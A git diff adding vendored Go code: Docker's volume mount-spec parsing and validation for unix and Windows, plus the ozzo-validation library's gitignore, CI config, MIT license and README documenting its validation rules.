+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true}},
+		{mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}},
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: DefaultCopyMode}},
+	}
+
+	for i, c := range cases {
+		t.Logf("case %d", i)
+		mp, err := ParseMountSpec(c.input)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		if c.expected.Type != mp.Type {
+			t.Fatalf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type)
+		}
+		if c.expected.Destination != mp.Destination {
+			t.Fatalf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination)
+		}
+		if c.expected.Source != mp.Source {
+			t.Fatalf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source)
+		}
+		if c.expected.RW != mp.RW {
+			t.Fatalf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW)
+		}
+		if c.expected.Propagation != mp.Propagation {
+			t.Fatalf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation)
+		}
+		if c.expected.Driver != mp.Driver {
+			t.Fatalf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver)
+		}
+		if c.expected.CopyData != mp.CopyData {
+			t.Fatalf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_unix.go b/vendor/github.com/docker/docker/volume/volume_unix.go
new file mode 100644
index 0000000000..0256ebb2ba
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_unix.go
@@ -0,0 +1,138 @@
+// +build linux freebsd darwin solaris
+
+package volume
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+)
+
+var platformRawValidationOpts = []func(o *validateOpts){
+	// need to make sure to not error out if the bind source does not exist on unix
+	// this is supported for historical reasons, the path will be automatically
+	// created later.
+	func(o *validateOpts) { o.skipBindSourceCheck = true },
+}
+
+// read-write modes
+var rwModes = map[string]bool{
+	"rw": true,
+	"ro": true,
+}
+
+// label modes
+var labelModes = map[string]bool{
+	"Z": true,
+	"z": true,
+}
+
+// BackwardsCompatible decides whether this mount point can be
+// used in old versions of Docker or not.
+// Only bind mounts and local volumes can be used in old versions of Docker.
+func (m *MountPoint) BackwardsCompatible() bool {
+	return len(m.Source) > 0 || m.Driver == DefaultDriverName
+}
+
+// HasResource checks whether the given absolute path for a container is in
+// this mount point. If the relative path starts with `../` then the resource
+// is outside of this mount point, but we can't simply check for this prefix
+// because it misses `..` which is also outside of the mount, so check both.
+func (m *MountPoint) HasResource(absolutePath string) bool {
+	relPath, err := filepath.Rel(m.Destination, absolutePath)
+	return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator))
+}
+
+// IsVolumeNameValid checks a volume name in a platform specific manner.
+func IsVolumeNameValid(name string) (bool, error) {
+	return true, nil
+}
+
+// ValidMountMode will make sure the mount mode is valid.
+// returns if it's a valid mount mode or not.
+func ValidMountMode(mode string) bool {
+	if mode == "" {
+		return true
+	}
+
+	rwModeCount := 0
+	labelModeCount := 0
+	propagationModeCount := 0
+	copyModeCount := 0
+
+	for _, o := range strings.Split(mode, ",") {
+		switch {
+		case rwModes[o]:
+			rwModeCount++
+		case labelModes[o]:
+			labelModeCount++
+		case propagationModes[mounttypes.Propagation(o)]:
+			propagationModeCount++
+		case copyModeExists(o):
+			copyModeCount++
+		default:
+			return false
+		}
+	}
+
+	// Only one string for each mode is allowed.
+	if rwModeCount > 1 || labelModeCount > 1 || propagationModeCount > 1 || copyModeCount > 1 {
+		return false
+	}
+	return true
+}
+
+// ReadWrite tells you if a mode string is a valid read-write mode or not.
+// If there are no specifications w.r.t read write mode, then by default
+// it returns true.
+func ReadWrite(mode string) bool {
+	if !ValidMountMode(mode) {
+		return false
+	}
+
+	for _, o := range strings.Split(mode, ",") {
+		if o == "ro" {
+			return false
+		}
+	}
+	return true
+}
+
+func validateNotRoot(p string) error {
+	p = filepath.Clean(convertSlash(p))
+	if p == "/" {
+		return fmt.Errorf("invalid specification: destination can't be '/'")
+	}
+	return nil
+}
+
+func validateCopyMode(mode bool) error {
+	return nil
+}
+
+func convertSlash(p string) string {
+	return filepath.ToSlash(p)
+}
+
+func splitRawSpec(raw string) ([]string, error) {
+	if strings.Count(raw, ":") > 2 {
+		return nil, errInvalidSpec(raw)
+	}
+
+	arr := strings.SplitN(raw, ":", 3)
+	if arr[0] == "" {
+		return nil, errInvalidSpec(raw)
+	}
+	return arr, nil
+}
+
+func clean(p string) string {
+	return filepath.Clean(p)
+}
+
+func validateStat(fi os.FileInfo) error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_unsupported.go b/vendor/github.com/docker/docker/volume/volume_unsupported.go
new file mode 100644
index 0000000000..ff9d6afa27
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_unsupported.go
@@ -0,0 +1,16 @@
+// +build !linux
+
+package volume
+
+import (
+	"fmt"
+	"runtime"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+)
+
+// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string
+// for mount(2).
+func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) {
+	return "", fmt.Errorf("%s does not support tmpfs", runtime.GOOS)
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_windows.go b/vendor/github.com/docker/docker/volume/volume_windows.go
new file mode 100644
index 0000000000..22f6fc7a14
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_windows.go
@@ -0,0 +1,201 @@
+package volume
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+)
+
+// read-write modes
+var rwModes = map[string]bool{
+	"rw": true,
+}
+
+// read-only modes
+var roModes = map[string]bool{
+	"ro": true,
+}
+
+var platformRawValidationOpts = []func(*validateOpts){
+	// filepath.IsAbs is weird on Windows:
+	//	`c:` is not considered an absolute path
+	//	`c:\` is considered an absolute path
+	// In any case, the regex matching below ensures absolute paths
+	// TODO: consider this a bug with filepath.IsAbs (?)
+	func(o *validateOpts) { o.skipAbsolutePathCheck = true },
+}
+
+const (
+	// Spec should be in the format [source:]destination[:mode]
+	//
+	// Examples: c:\foo bar:d:rw
+	//           c:\foo:d:\bar
+	//           myname:d:
+	//           d:\
+	//
+	// Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See
+	// https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to
+	// test is https://regex-golang.appspot.com/assets/html/index.html
+	//
+	// Useful link for referencing named capturing groups:
+	// http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex
+	//
+	// There are three match groups: source, destination and mode.
+	//
+
+	// RXHostDir is the first option of a source
+	RXHostDir = `[a-z]:\\(?:[^\\/:*?"<>|\r\n]+\\?)*`
+	// RXName is the second option of a source
+	RXName = `[^\\/:*?"<>|\r\n]+`
+	// RXReservedNames are reserved names not possible on Windows
+	RXReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])`
+
+	// RXSource is the combined possibilities for a source
+	RXSource = `((?P<source>((` + RXHostDir + `)|(` + RXName + `))):)?`
+
+	// Source. Can be either a host directory, a name, or omitted:
+	//  HostDir:
+	//    -  Essentially using the folder solution from
+	//       https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html
+	//       but adding case insensitivity.
+	//    -  Must be an absolute path such as c:\path
+	//    -  Can include spaces such as `c:\program files`
+	//    -  And then followed by a colon which is not in the capture group
+	//    -  And can be optional
+	//  Name:
+	//    -  Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
+	//    -  And then followed by a colon which is not in the capture group
+	//    -  And can be optional
+
+	// RXDestination is the regex expression for the mount destination
+	RXDestination = `(?P<destination>([a-z]):((?:\\[^\\/:*?"<>\r\n]+)*\\?))`
+	// Destination (aka container path):
+	//    -  Variation on hostdir but can be a drive followed by colon as well
+	//    -  If a path, must be absolute. Can include spaces
+	//    -  Drive cannot be c: (explicitly checked in code, not RegEx)
+
+	// RXMode is the regex expression for the mode of the mount
+	// Mode (optional):
+	//    -  Hopefully self explanatory in comparison to above regex's.
+	//    -  Colon is not in the capture group
+	RXMode = `(:(?P<mode>(?i)ro|rw))?`
+)
+
+// BackwardsCompatible decides whether this mount point can be
+// used in old versions of Docker or not.
+// Windows volumes are never backwards compatible.
+func (m *MountPoint) BackwardsCompatible() bool {
+	return false
+}
+
+func splitRawSpec(raw string) ([]string, error) {
+	specExp := regexp.MustCompile(`^` + RXSource + RXDestination + RXMode + `$`)
+	match := specExp.FindStringSubmatch(strings.ToLower(raw))
+
+	// Must have something back
+	if len(match) == 0 {
+		return nil, errInvalidSpec(raw)
+	}
+
+	var split []string
+	matchgroups := make(map[string]string)
+	// Pull out the sub expressions from the named capture groups
+	for i, name := range specExp.SubexpNames() {
+		matchgroups[name] = strings.ToLower(match[i])
+	}
+	if source, exists := matchgroups["source"]; exists {
+		if source != "" {
+			split = append(split, source)
+		}
+	}
+	if destination, exists := matchgroups["destination"]; exists {
+		if destination != "" {
+			split = append(split, destination)
+		}
+	}
+	if mode, exists := matchgroups["mode"]; exists {
+		if mode != "" {
+			split = append(split, mode)
+		}
+	}
+	// Fix #26329. If the destination appears to be a file, and the source is null,
+	// it may be because we've fallen through the possible naming regex and hit a
+	// situation where the user intention was to map a file into a container through
+	// a local volume, but this is not supported by the platform.
+	if matchgroups["source"] == "" && matchgroups["destination"] != "" {
+		validName, err := IsVolumeNameValid(matchgroups["destination"])
+		if err != nil {
+			return nil, err
+		}
+		if !validName {
+			if fi, err := os.Stat(matchgroups["destination"]); err == nil {
+				if !fi.IsDir() {
+					return nil, fmt.Errorf("file '%s' cannot be mapped. Only directories can be mapped on this platform", matchgroups["destination"])
+				}
+			}
+		}
+	}
+	return split, nil
+}
+
+// IsVolumeNameValid checks a volume name in a platform specific manner.
+func IsVolumeNameValid(name string) (bool, error) {
+	nameExp := regexp.MustCompile(`^` + RXName + `$`)
+	if !nameExp.MatchString(name) {
+		return false, nil
+	}
+	nameExp = regexp.MustCompile(`^` + RXReservedNames + `$`)
+	if nameExp.MatchString(name) {
+		return false, fmt.Errorf("volume name %q cannot be a reserved word for Windows filenames", name)
+	}
+	return true, nil
+}
+
+// ValidMountMode will make sure the mount mode is valid.
+// returns if it's a valid mount mode or not.
+func ValidMountMode(mode string) bool {
+	if mode == "" {
+		return true
+	}
+	return roModes[strings.ToLower(mode)] || rwModes[strings.ToLower(mode)]
+}
+
+// ReadWrite tells you if a mode string is a valid read-write mode or not.
+func ReadWrite(mode string) bool {
+	return rwModes[strings.ToLower(mode)] || mode == ""
+}
+
+func validateNotRoot(p string) error {
+	p = strings.ToLower(convertSlash(p))
+	if p == "c:" || p == `c:\` {
+		return fmt.Errorf("destination path cannot be `c:` or `c:\\`: %v", p)
+	}
+	return nil
+}
+
+func validateCopyMode(mode bool) error {
+	if mode {
+		return fmt.Errorf("Windows does not support copying image path content")
+	}
+	return nil
+}
+
+func convertSlash(p string) string {
+	return filepath.FromSlash(p)
+}
+
+func clean(p string) string {
+	if match, _ := regexp.MatchString("^[a-z]:$", p); match {
+		return p
+	}
+	return filepath.Clean(p)
+}
+
+func validateStat(fi os.FileInfo) error {
+	if !fi.IsDir() {
+		return fmt.Errorf("source path must be a directory")
+	}
+	return nil
+}
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/.gitignore b/vendor/github.com/go-ozzo/ozzo-validation/.gitignore
new file mode 100644
index 0000000000..daf913b1b3
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/.gitignore
@@ -0,0 +1,24 @@
+# Compiled Object files, Static and Dynamic libs (Shared Objects)
+*.o
+*.a
+*.so
+
+# Folders
+_obj
+_test
+
+# Architecture specific extensions/prefixes
+*.[568vq]
+[568vq].out
+
+*.cgo1.go
+*.cgo2.c
+_cgo_defun.c
+_cgo_gotypes.go
+_cgo_export.*
+
+_testmain.go
+
+*.exe
+*.test
+*.prof
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml b/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml
new file mode 100644
index 0000000000..aedd4540b4
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/.travis.yml
@@ -0,0 +1,16 @@
+language: go
+
+go:
+  - 1.6
+  - 1.7
+  - tip
+
+install:
+  - go get golang.org/x/tools/cmd/cover
+  - go get github.com/mattn/goveralls
+  - go list -f '{{range .Imports}}{{.}} {{end}}' ./... | xargs go get -v
+  - go list -f '{{range .TestImports}}{{.}} {{end}}' ./... | xargs go get -v
+
+script:
+  - go test -v -covermode=count -coverprofile=coverage.out
+  - $HOME/gopath/bin/goveralls -coverprofile=coverage.out -service=travis-ci
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/LICENSE b/vendor/github.com/go-ozzo/ozzo-validation/LICENSE
new file mode 100644
index 0000000000..d235be9cc6
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/LICENSE
@@ -0,0 +1,17 @@
+The MIT License (MIT)
+Copyright (c) 2016, Qiang Xue
+
+Permission is hereby granted, free of charge, to any person obtaining a copy of this software
+and associated documentation files (the "Software"), to deal in the Software without restriction,
+including without limitation the rights to use, copy, modify, merge, publish, distribute,
+sublicense, and/or sell copies of the Software, and to permit persons to whom the Software
+is furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all copies or
+substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
+BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
+DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
diff --git a/vendor/github.com/go-ozzo/ozzo-validation/README.md b/vendor/github.com/go-ozzo/ozzo-validation/README.md
new file mode 100644
index 0000000000..1841a7cb49
--- /dev/null
+++ b/vendor/github.com/go-ozzo/ozzo-validation/README.md
@@ -0,0 +1,530 @@
+# ozzo-validation
+
+[![GoDoc](https://godoc.org/github.com/go-ozzo/ozzo-validation?status.png)](http://godoc.org/github.com/go-ozzo/ozzo-validation)
+[![Build Status](https://travis-ci.org/go-ozzo/ozzo-validation.svg?branch=master)](https://travis-ci.org/go-ozzo/ozzo-validation)
+[![Coverage Status](https://coveralls.io/repos/github/go-ozzo/ozzo-validation/badge.svg?branch=master)](https://coveralls.io/github/go-ozzo/ozzo-validation?branch=master)
+[![Go Report](https://goreportcard.com/badge/github.com/go-ozzo/ozzo-validation)](https://goreportcard.com/report/github.com/go-ozzo/ozzo-validation)
+
+## Description
+
+ozzo-validation is a Go package that provides configurable and extensible data validation capabilities.
+It has the following features:
+
+* use normal programming constructs rather than error-prone struct tags to specify how data should be validated.
+* can validate data of different types, e.g., structs, strings, byte slices, slices, maps, arrays.
+* can validate custom data types as long as they implement the `Validatable` interface.
+* can validate data types that implement the `sql.Valuer` interface (e.g. `sql.NullString`).
+* customizable and well-formatted validation errors.
+* provide a rich set of validation rules right out of box.
+* extremely easy to create and use custom validation rules.
+
+
+## Requirements
+
+Go 1.6 or above.
+
+
+## Getting Started
+
+The ozzo-validation package mainly includes a set of validation rules and two validation methods. You use 
+validation rules to describe how a value should be considered valid, and you call either `validation.Validate()`
+or `validation.ValidateStruct()` to validate the value.
+
+
+### Installation
+
+Run the following command to install the package:
+
+```
+go get github.com/go-ozzo/ozzo-validation
+go get github.com/go-ozzo/ozzo-validation/is
+```
+
+### Validating a Simple Value
+
+For a simple value, such as a string or an integer, you may use `validation.Validate()` to validate it. For example, 
+
+```go
+package main
+
+import (
+	"fmt"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/go-ozzo/ozzo-validation/is"
+)
+
+func main() {
+	data := "example"
+	err := validation.Validate(data,
+		validation.Required,       // not empty
+		validation.Length(5, 100), // length between 5 and 100
+		is.URL,                    // is a valid URL
+	)
+	fmt.Println(err)
+	// Output:
+	// must be a valid URL
+}
+```
+
+The method `validation.Validate()` will run through the rules in the order that they are listed. If a rule fails
+the validation, the method will return the corresponding error and skip the rest of the rules. The method will
+return nil if the value passes all validation rules.
+
+
+### Validating a Struct
+
+For a struct value, you usually want to check if its fields are valid. For example, in a RESTful application, you
+may unmarshal the request payload into a struct and then validate the struct fields. If one or multiple fields
+are invalid, you may want to get an error describing which fields are invalid. You can use `validation.ValidateStruct()`
+to achieve this purpose. A single struct can have rules for multiple fields, and a field can be associated with multiple 
+rules. For example,
+
+```go
+package main
+
+import (
+	"fmt"
+	"regexp"
+
+	"github.com/go-ozzo/ozzo-validation"
+	"github.com/go-ozzo/ozzo-validation/is"
+)
+
+type Address struct {
+	Street string
+	City   string
+	State  string
+	Zip    string
+}
+
+func (a Address) Validate() error {
+	return validation.ValidateStruct(&a,
+		// Street cannot be empty, and the length must between 5 and 50
+		validation.Field(&a.Street, validation.Required, validation.Length(5, 50)),
+		// City cannot be empty, and the length must between 5 and 50
+		validation.Field(&a.City, validation.Required, validation.Length(5, 50)),
+		// State cannot be empty, and must be a string consisting of two letters in upper case
+		validation.Field(&a.State, validation.Required, validation.Match(regexp.MustCompile("^[A-Z]{2}$"))),
+		// State cannot be empty, and must be a string consisting of five digits
+		validation.Field(&a.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))),
+	)
+}
+
+func main() {
+	a := Address{
+		Street: "123",
+		City:   "Unknown",
+		State:  "Virginia",
+		Zip:    "12345",
+	}
+
+	err := a.Validate()
+	fmt.Println(err)
+	// Output:
+	// Street: the length must be between 5 and 50; State: must be in a valid format.
+}
+```
+
+Note that when calling `validation.ValidateStruct` to validate a struct, you should pass to the method a pointer 
+to the struct instead of the struct itself. Similarly, when calling `validation.Field` to specify the rules
+for a struct field, you should use a pointer to the struct field. 
+
+When the struct validation is performed, the fields are validated in the order they are specified in `ValidateStruct`. 
+And when each field is validated, its rules are also evaluated in the order they are associated with the field.
+If a rule fails, an error is recorded for that field, and the validation will continue with the next field.
+
+
+### Validation Errors
+
+The `validation.ValidateStruct` method returns validation errors found in struct fields in terms of `validation.Errors` 
+which is a map of fields and their corresponding errors. Nil is returned if validation passes.
+
+By default, `validation.Errors` uses the struct tags named `json` to determine what names should be used to 
+represent the invalid fields. The type also implements the `json.Marshaler` interface so that it can be marshaled 
+into a proper JSON object. For example,
+
+```go
+type Address struct {
+	Street string `json:"street"`
+	City   string `json:"city"`
+	State  string `json:"state"`
+	Zip    string `json:"zip"`
+}
+
+// ...perform validation here...
+
+err := a.Validate()
+b, _ := json.Marshal(err)
+fmt.Println(string(b))
+// Output:
+// {"street":"the length must be between 5 and 50","state":"must be in a valid format"}
+```
+
+You may modify `validation.ErrorTag` to use a different struct tag name.
+
+If you do not like the magic that `ValidateStruct` determines error keys based on struct field names or corresponding
+tag values, you may use the following alternative approach:
+
+```go
+c := Customer{
+	Name:  "Qiang Xue",
+	Email: "q",
+	Address: Address{
+		State:  "Virginia",
+	},
+}
+
+err := validation.Errors{
+	"name": validation.Validate(c.Name, validation.Required, validation.Length(5, 20)),
+	"email": validation.Validate(c.Name, validation.Required, is.Email),
+	"zip": validation.Validate(c.Address.Zip, validation.Required, validation.Match(regexp.MustCompile("^[0-9]{5}$"))),
+}.Filter()
+fmt.Println(err)
+// Output:
+// email: must be a valid email address; zip: cannot be blank.
+```
+
+In the above example, we build a `validation.Errors` by a list of names and the corresponding validation results. 
+At the end we call `Errors.Filter()` to remove from `Errors` all nils which correspond to those successful validation 
+results. The method will return nil if `Errors` is empty.
+
+The above approach is very flexible as it allows you to freely build up your validation error structure. You can use
+it to validate both struct and non-struct values. Compared to using `ValidateStruct` to validate a struct, 
+it has the drawback that you have to redundantly specify the error keys while `ValidateStruct` can automatically 
+find them out.
+
+
+### Internal Errors
+
+Internal errors are different from validation errors in that internal errors are caused by malfunctioning code (e.g.
+a validator making a remote call to validate some data when the remote service is down) rather
+than the data being validated. When an internal error happens during data validation, you may allow the user to resubmit
+the same data to perform validation again, hoping the program resumes functioning. On the other hand, if data validation
+fails due to data error, the user should generally not resubmit the same data again.
+
+To differentiate internal errors from validation errors, when an internal error occurs in a validator, wrap it
+into `validation.InternalError` by calling `validation.NewInternalError()`. The user of the validator can then check
+if a returned error is an internal error or not. For example,
+
+```go
+if err := a.Validate(); err != nil {
+	if e, ok := err.(validation.InternalError); ok {
+		// an internal error happened
+		fmt.Println(e.InternalError())
+	}
+}
+```
+
+
+## Validatable Types
+
+A type is validatable if it implements the `validation.Validatable` interface. 
+
+When `validation.Validate` is used to validate a validatable value, if it does not find any error with the 
+given validation rules, it will further call the value's `Validate()` method. 
+
+Similarly, when `validation.ValidateStruct` is validating a struct field whose type is validatable, it will call 
+the field's `Validate` method after it passes the listed rules. 
+
+In the following example, the `Address` field of `Customer` is validatable because `Address` implements 
+`validation.Validatable`. Therefore, when validating a `Customer` struct with `validation.ValidateStruct`,
+validation will "dive" into the `Address` field.
+
+```go
+type Customer struct {
+	Name    string
+	Gender  string
+	Email   string
+	Address Address
+}
+
+func (c Customer) Validate() error {
+	return validation.ValidateStruct(&c,
+		// Name cannot be empty, and the length must be between 5 and 20.
+		validation.Field(&c.Name, validation.Required, validation.Length(5, 20)),
+		// Gender is optional, and should be either "Female" or "Male".
+		validation.Field(&c.Gender, validation.In("Female", "Male")),
+		// Email cannot be empty and should be in a valid email format.
+		validation.Field(&c.Email, validation.Required, is.Email),
+		// Validate Address using its own validation rules
+		validation.Field(&c.Address),
+	)
+}
+
+c := Customer{
+	Name:  "Qiang Xue",
+	Email: "q",
+	Address: Address{
+		Street: "123 Main Street",
+		City:   "Unknown",
+		State:  "Virginia",
+		Zip:    "12345",
+	},
+}
+
+err := c.Validate()
+fmt.Println(err)
+// Output:
+// Address: (State: must be in a valid format.); Email: must be a valid email address.
+```
+
+Sometimes, you may want to skip the invocation of a type's `Validate` method. To do so, simply associate
+a `validation.Skip` rule with the value being validated.
+
+
+### Maps/Slices/Arrays of Validatables
+
+When validating a map, slice, or array, whose element type implements the `validation.Validatable` interface,
+the `validation.Validate` method will call the `Validate` method of every non-nil element.
+The validation errors of the elements will be returned as `validation.Errors` which maps the keys of the
+invalid elements to their corresponding validation errors. For example,
+
+```go
+addresses := []Address{
+	Address{State: "MD", Zip: "12345"},
+	Address{Street: "123 Main St", City: "Vienna", State: "VA", Zip: "12345"},
+	Address{City: "Unknown", State: "NC", Zip: "123"},
+}
+err := validation.Validate(addresses)
+fmt.Println(err)
+// Output:
+// 0: (City: cannot be blank; Street: cannot be blank.); 2: (Street: cannot be blank; Zip: must be in a valid format.).
+```
+
+When using `validation.ValidateStruct` to validate a struct, the above validation procedure also applies to those struct 
+fields which are map/slices/arrays of validatables. 
+
+
+### Pointers
+
+When a value being validated is a pointer, most validation rules will validate the actual value pointed to by the pointer.
+If the pointer is nil, these rules will skip the validation.
+
+An exception is the `validation.Required` and `validation.NotNil` rules. When a pointer is nil, they
+will report a validation error.
+
+
+### Types Implementing `sql.Valuer`
+
+If a data type implements the `sql.Valuer` interface (e.g. `sql.NullString`), the built-in validation rules will handle
+it properly. In particular, when a rule is validating such data, it will call the `Value()` method and validate
+the returned value instead.
+
+
+### Required vs. Not Nil
+
+When validating input values, there are two different scenarios about checking if input values are provided or not.
+
+In the first scenario, an input value is considered missing if it is not entered or it is entered as a zero value
+(e.g. an empty string, a zero integer). You can use the `validation.Required` rule in this case.
+
+In the second scenario, an input value is considered missing only if it is not entered. A pointer field is usually
+used in this case so that you can detect if a value is entered or not by checking if the pointer is nil or not.
+You can use the `validation.NotNil` rule to ensure a value is entered (even if it is a zero value).
+
+
+### Embedded Structs
+
+The `validation.ValidateStruct` method will properly validate a struct that contains embedded structs. In particular,
+the fields of an embedded struct are treated as if they belong directly to the containing struct. For example,
+
+```go
+type Employee struct {
+	Name string
+}
+
+func ()
+
+type Manager struct {
+	Employee
+	Level int
+}
+
+m := Manager{}
+err := validation.ValidateStruct(&m,
+	validation.Field(&m.Name, validation.Required),
+	validation.Field(&m.Level, validation.Required),
+)
+fmt.Println(err)
+// Output:
+// Level: cannot be blank; Name: cannot be blank.
+```
+
+In the above code, we use `&m.Name` to specify the validation of the `Name` field of the embedded struct `Employee`.
+And the validation error uses `Name` as the key for the error associated with the `Name` field as if `Name` a field
+directly belonging to `Manager`.
+
+If `Employee` implements the `validation.Validatable` interface, we can also use the following code to validate
+`Manager`, which generates the same validation result:
+
+```go
+func (e Employee) Validate() error {
+	return validation.ValidateStruct(&e,
+		validation.Field(&e.Name, validation.Required),
+	)
+}
+
+err := validation.ValidateStruct(&m,
+	validation.Field(&m.Employee),
+	validation.Field(&m.Level, validation.Required),
+)
+fmt.Println(err)
+// Output:
+// Level: cannot be blank; Name: cannot be blank.
+```
+
+
+## Built-in Validation Rules
+
+The following rules are provided in the `validation` package:
+
+* `In(...interface{})`: checks if a value can be found in the given list of values.
+* `Length(min, max int)`: checks if the length of a value is within the specified range.
+  This rule should only be used for validating strings, slices, maps, and arrays.
+* `RuneLength(min, max int)`: checks if the length of a string is within the specified range.
+  This rule is similar as `Length` except that when the value being validated is a string, it checks
+  its rune length instead of byte length.
+* `Min(min interface{})` and `Max(max interface{})`: checks if a value is within the specified range.
+  These two rules should only be used for validating int, uint, float and time.Time types.
+* `Match(*regexp.Regexp)`: checks if a value matches the specified regular expression.
+  This rule should only be used for strings and byte slices.
+* `Date(layout string)`: checks if a string value is a date whose format is specified by the layout.
+  By calling `Min()` and/or `Max()`, you can check additionally if the date is within the specified range.
+* `Required`: checks if a value is not empty (neither nil nor zero).
+* `NotNil`: checks if a pointer value is not nil. Non-pointer values are considered valid.
+* `NilOrNotEmpty`: checks if a value is a nil pointer or a non-empty value. This differs from `Required` in that it treats a nil pointer as valid.
+* `Skip`: this is a special rule used to indicate that all rules following it should be skipped (including the nested ones).
+
+The `is` sub-package provides a list of commonly used string validation rules that can be used to check if the format
+of a value satisfies certain requirements. Note that these rules only handle strings and byte slices and if a string
+ or byte slice is empty, it is considered valid. You may use a `Required` rule to ensure a value is not empty.
+Below is the whole list of the rules provided by the `is` package:
+
+* `Email`: validates if a string is an email or not
+* `URL`: validates if a string is a valid URL
+* `RequestURL`: validates if a string is a valid request URL
+* `RequestURI`: validates if a string is a valid request URI
+* `Alpha`: validates if a string contains English letters only (a-zA-Z)
+* `Digit`: validates if a string contains digits only (0-9)
+* `Alphanumeric`: validates if a string contains English letters and digits only (a-zA-Z0-9)
+* `UTFLetter`: validates if a string contains unicode letters only
+* `UTFDigit`: validates if a string contains unicode decimal digits only
+* `UTFLetterNumeric`: validates if a string contains unicode letters and numbers only
+* `UTFNumeric`: validates if a string contains unicode number characters (category N) only
+* `LowerCase`: validates if a string contains lower case unicode letters only
+* `UpperCase`: validates if a string contains upper case unicode letters only
+* `Hexadecimal`: validates if a string is a valid hexadecimal number
+* `HexColor`: validates if a string is a valid hexadecimal color code
+* `RGBColor`: validates if a string is a valid RGB color in the form of rgb(R, G, B)
+* `Int`: validates if a string is a valid integer number
+* `Float`: validates if a string is a floating point number
+* `UUIDv3`: validates if a string is a valid version 3 UUID
+* `UUIDv4`: validates if a string is a valid version 4 UUID
+* `UUIDv5`: validates if a string is a valid version 5 UUID
+* `UUID`: validates if a string is a valid UUID
+* `CreditCard`: validates if a string is a valid credit card number
+* `ISBN10`: validates if a string is an ISBN version 10
+* `ISBN13`: validates if a string is an ISBN version 13
+* `ISBN`: validates if a string is an ISBN (either version 10 or 13)
+* `JSON`: validates if a string is in valid JSON format
+* `ASCII`: validates if a string contains ASCII characters only
+* `PrintableASCII`: validates if a string contains printable ASCII characters only
+* `Multibyte`: validates if a string contains multibyte characters
+* `FullWidth`: validates if a string contains full-width characters
+* `HalfWidth`: validates if a string contains half-width characters
+* `VariableWidth`: validates if a string contains both full-width and half-width characters
+* `Base64`: validates if a string is encoded in Base64
+* `DataURI`: validates if a string is a valid base64-encoded data URI
+* `CountryCode2`: validates if a string is a valid ISO3166 Alpha 2 country code
+* `CountryCode3`: validates if a string is a valid ISO3166 Alpha 3 country code
+* `DialString`: validates if a string is a valid dial string that can be passed to Dial()
+* `MAC`: validates if a string is a MAC address
+* `IP`: validates if a string is a valid IP address (either version 4 or 6)
+* `IPv4`: validates if a string is a valid version 4 IP address
+* `IPv6`: validates if a string is a valid version 6 IP address
